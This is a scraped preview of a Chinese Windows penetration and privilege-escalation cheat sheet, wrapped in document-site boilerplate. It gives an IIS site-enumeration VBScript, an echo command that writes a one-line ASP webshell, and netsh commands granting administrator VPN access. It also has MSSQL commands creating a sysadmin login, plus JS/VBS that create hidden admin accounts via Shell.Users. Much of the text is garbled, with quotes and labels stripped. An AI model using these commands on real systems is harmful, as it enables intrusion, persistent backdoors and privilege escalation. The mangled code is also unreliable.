- 1、本文档共25页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Windows渗透与提权技巧汇总
Windows MSSQL
VNC Radmin Cmd Webshell
VBS
1. On Error Resume Next
2. If (LCase(Right(WScript.Fullname, 11)) = wscript.exe) Then
3. MsgBox Space(12) IIS Virtual Web Viewer Space(12) Chr(13)
Space(9) Usage:Cscript vWeb.vbs, 4096, Lilo
4. WScript.Quit
5. End If
6. Set objservice = GetObject(IIS://LocalHost/W3SVC)
7. For Each obj3w In objservice
8. If IsNumeric(obj3w.Name) Then
9. Set OService = GetObject(IIS://LocalHost/W3SVC/ obj3w.Name)
10. Set VDirObj = OService.GetObject(IIsWebVirtualDir, ROOT)
11. If Err 0 Then WScript.Quit (1)
12. WScript.Echo Chr(10) [ OService.ServerComment ]
13. For Each Binds In OService.ServerBindings
14. Web = { Replace(Binds, :, } { ) }
15. WScript.Echo Replace(Split(Replace(Web, , ), }{)(2), }, )
16. Next
17. WScript.Echo Path : VDirObj.Path
18. End If
19. Next
iis_spy ASPXIISSPY activeds.dllactiveds.tlb
“echo
^%execute(request(“cmd”))%^ X:\\X.asp” “copy X:\
\X.asp”webshelltype
data/htdocs.//
CMD VPN
administrator VPN
netsh ras set user administrator permit
administrator VPN
netsh ras set user administrator deny
VPN
netsh ras show user
VPN IP
netsh ras ip show config
IP
netsh ras ip set addrassign method = pool
54
netsh ras ip add range from = to = 54
CmdDos SQL
“c:\test.qry”
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember test, sysadmin
DOS cmd.exe /c isql -E /U alma /P /i c:\test.qry
net.exe adsi
js:
1. var o=new ActiveXObject( Shell.Users );
2. z=o.create(test) ;
3. z.changePassword(123456,)
4. z.setting(AccountType)=3;
5. vbs:
6. view source
7. Set o=CreateObject( Shell.Users )
8. Set z=o.create(test)
9. z.changePassword 123456,
10. z.setting(AccountType)=3
Cmd
您可能关注的文档
- 模数转换器ADC0809与AT89C51的一种接口方法.pdf
- CUHK选课指南.pdf
- 第11章 微机原理习题库.pdf
- Presented at “Taking the Measure of ADD”.pdf
- CMOS斩波运放的分析与设计.pdf
- .net课件VB(第三章)-2.pdf
- ADC–AD7606.pdf
- apache和nginx常用的模块指令对照表.pdf
- Module 1 部署和管理Windows Server.pdf
- 28335的DMA 操作 及ADC.pdf
- 五年级数学上册5简易方程2解简易方程第8课时实际问题与方程3教学设计新人教版.doc
- 2024_2025学年新教材高中生物第2章细胞的结构和生命活动第3节第1课时细胞质膜具有选择透过性教案苏教版必修1.doc
- 江苏专用2025版高考地理一轮复习第十二章人类与地理环境的协调发展1人类与地理环境的协调练习含解析新人教版.doc
- 2024_2025学年高中化学第一章物质结构元素周期律第三节化学键练习含解析新人教版必修2.docx
- 2024_2025学年高中政治专题二君主立宪制和民主共和制:以英国和法国为例综合训练含解析新人教版选修3.docx
- 2024_2025学年高中生物课时分层作业18捕获光能的色素和结构含解析新人教版必修1.doc
- 2024_2025学年高中政治专题一古典政治经济学巨匠的理论遗产第3框李嘉图的理论贡献学案新人教版选修2.doc
- 2024_2025学年新教材高中生物第6章细胞的生命历程3细胞的衰老和死亡学案2新人教版必修1.doc
- 2024_2025学年新教材高中生物第6章生物的进化1生物有共同祖先的证据学案新人教版必修2.doc
- 司机保证书15篇 .pdf
文档评论(0)